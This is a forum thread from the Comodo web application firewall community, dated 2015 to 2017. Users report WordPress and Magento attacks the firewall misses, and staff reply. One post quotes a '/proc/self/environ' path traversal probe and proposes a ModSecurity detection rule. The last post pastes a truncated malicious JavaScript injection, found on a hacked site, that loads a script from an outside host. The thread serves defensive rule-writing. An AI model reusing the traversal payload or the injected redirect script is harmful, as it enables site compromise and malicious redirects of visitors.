Author Topic: Attacks and Exploits which are undetected  (Read 3187 times)

Offline vadim

  • Moderator
  • Comodo's Hero
  • *****
  • Posts: 334
Attacks and Exploits which are undetected
« on: March 05, 2015, 09:51:02 AM »
We would be grateful for any information about attacks and exploits which are undetected by Comodo WAF.

Thank you for all your feedbacks which help us to improve Comodo protection rules.
--
Vadim Lvovskiy
Development Manager
COMODO Group Inc.

Offline xanubi

  • Comodo Loves me
  • ****
  • Posts: 106
Re: Attacks and Exploits which are undetected
« Reply #1 on: March 25, 2015, 11:12:20 AM »

Offline ozsup

  • Newbie
  • *
  • Posts: 18
Re: Attacks and Exploits which are undetected
« Reply #2 on: April 28, 2015, 12:19:56 AM »

Offline Hedloff

  • Comodo Loves me
  • ****
  • Posts: 149
Re: Attacks and Exploits which are undetected
« Reply #3 on: April 30, 2015, 08:38:11 AM »
Magento shoplift hack should be added asap!
Any eta on that?

Offline ozsup

  • Newbie
  • *
  • Posts: 18
Re: Attacks and Exploits which are undetected
« Reply #4 on: May 12, 2015, 12:14:33 PM »
What's the point in asking users for input when the rules don't get added?

For example the revslider rule has never been added to the LiteSpeed ruleset, refer to thread: https://forums.comodo.com/free-modsecurity-rules-comodo-web-application-firewall-b223.0/-t107211.0.html

Now we have the ShopLift hack from Mangento which also hasn't been patched.  Hackers would have already reaped the benefits and dismantled as many sites as possible.

There's no point running a WAF if the rules are delayed by weeks or months... hackers will infiltrate before that time.

Offline xanubi

  • Comodo Loves me
  • ****
  • Posts: 106
Re: Attacks and Exploits which are undetected
« Reply #5 on: May 13, 2015, 06:24:41 AM »

Offline xanubi

  • Comodo Loves me
  • ****
  • Posts: 106
REVSLIDER
« Reply #6 on: May 15, 2015, 03:46:46 AM »
REVSLIDER continues.
This one is BIG, attacked on thousands of sites, that still don't update, and it seems that's very hard to update this plugin.

I thought CWAF blocked this, but it seems that it doesn't block at all, OWASP do.

Please make a block on this one, just this night 10 wordpress's where attacked with this. My antivirus rules blocked the shell file, but this is on the wild, free for everyone to attack.

https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html

Offline gshost

  • Newbie
  • *
  • Posts: 6
Re: Attacks and Exploits which are undetected
« Reply #7 on: July 23, 2015, 06:45:57 AM »
Hello,

there are many XML RPC attacks. Can you make rule for that? if there is a rule can you post a number?

Thanks

Offline oetaz

  • Newbie
  • *
  • Posts: 12
Re: Attacks and Exploits which are undetected
« Reply #8 on: January 07, 2016, 09:29:41 AM »
any update on any of these?

I reported https://blog.sucuri.net/2015/02/malware-cleanup-to-arbitrary-file-upload-in-gravity-forms.html many months ago (in the report thread) and im still seeing it run wild

Offline TDmitry

  • Head CWAF Rule Writing Team
  • Comodo's Hero
  • *****
  • Posts: 357
Re: Attacks and Exploits which are undetected
« Reply #9 on: January 07, 2016, 02:37:39 PM »
any update on any of these?

I reported https://blog.sucuri.net/2015/02/malware-cleanup-to-arbitrary-file-upload-in-gravity-forms.html many months ago (in the report thread) and im still seeing it run wild
Do you know CVE id for this vulnerability?

Offline TDmitry

  • Head CWAF Rule Writing Team
  • Comodo's Hero
  • *****
  • Posts: 357
Re: Attacks and Exploits which are undetected
« Reply #10 on: January 07, 2016, 02:40:23 PM »
Hello,

there are many XML RPC attacks. Can you make rule for that? if there is a rule can you post a number?

Thanks
Sorry for delay reply, we have records set starting from 240330 designed to protect users from XML-RPC attacks.

Offline oetaz

  • Newbie
  • *
  • Posts: 12
Re: Attacks and Exploits which are undetected
« Reply #11 on: January 13, 2016, 12:18:29 AM »

Offline LBJ

  • Newbie
  • *
  • Posts: 11
../../proc/self/environ exploits
« Reply #12 on: April 05, 2016, 12:39:43 PM »
CWAF currently does not protect vulnerable applications which do not sanitize inputs correctly of the form...

index.php?location=../../../../proc/self/environ

For background information, please see numerous articles such as...

https://www.exploit-db.com/papers/12886/

The current rule of...

Code: [Select]
SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|XML:/*|!ARGS:/body/|!ARGS:code|!ARGS:/content/|!ARGS:/description/|!ARGS:/install\[values\]\[\w+\]\[fileDenyPattern\]/|!ARGS:/message/|!ARGS:Post|!ARGS:desc|!ARGS:text|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|!ARGS:wpTextbox1 "(?:(?<!\w)(?:\.(?:ht(?:access|group|passwd)|www_{0,1}acl)|boot\.ini|global\.asa|httpd\.conf)\b|/etc/)" \
"id:211190,rev:8,msg:'COMODO WAF: Remote File Access Attempt',phase:2,severity:2,capture,block,setvar:'tx.points=+%{tx.points_limit4}',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',ctl:'auditLogParts=+E',t:'none',t:'cmdLine'"

...should include protection of /proc/ to become...

Code: [Select]
SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|XML:/*|!ARGS:/body/|!ARGS:code|!ARGS:/content/|!ARGS:/description/|!ARGS:/install\[values\]\[\w+\]\[fileDenyPattern\]/|!ARGS:/message/|!ARGS:Post|!ARGS:desc|!ARGS:text|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|!ARGS:wpTextbox1 "(?:(?<!\w)(?:\.(?:ht(?:access|group|passwd)|www_{0,1}acl)|boot\.ini|global\.asa|httpd\.conf)\b|/etc/|/proc/)" \
"id:211190,rev:8,msg:'COMODO WAF: Remote File Access Attempt',phase:2,severity:2,capture,block,setvar:'tx.points=+%{tx.points_limit4}',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',ctl:'auditLogParts=+E',t:'none',t:'cmdLine'"

Other rule sets include this protection, and I can not see a downside to its inclusion. We have added a custom rule on our own servers, but it would be nice to have it included as standard in CWAF.

Offline jarecki74

  • Newbie
  • *
  • Posts: 7
Re: Attacks and Exploits which are undetected
« Reply #13 on: March 19, 2017, 11:14:03 AM »
wordpres  4.7.3   ,   php 5.3.29, apache 2.2x , cp/whm 

found in  home page article source 

Code: [Select]

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‚&default_keyword=’ + encodeURIComponent(document.title) + ”; if(document.cookie.indexOf(„_mauthtoken”)==-1){(function(a,b){if(a.indexOf(„googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-

« Last Edit: March 19, 2017, 11:18:57 AM by jarecki74 »

 

Seo4Smf 2.0 © SmfMod.Com Smf Destek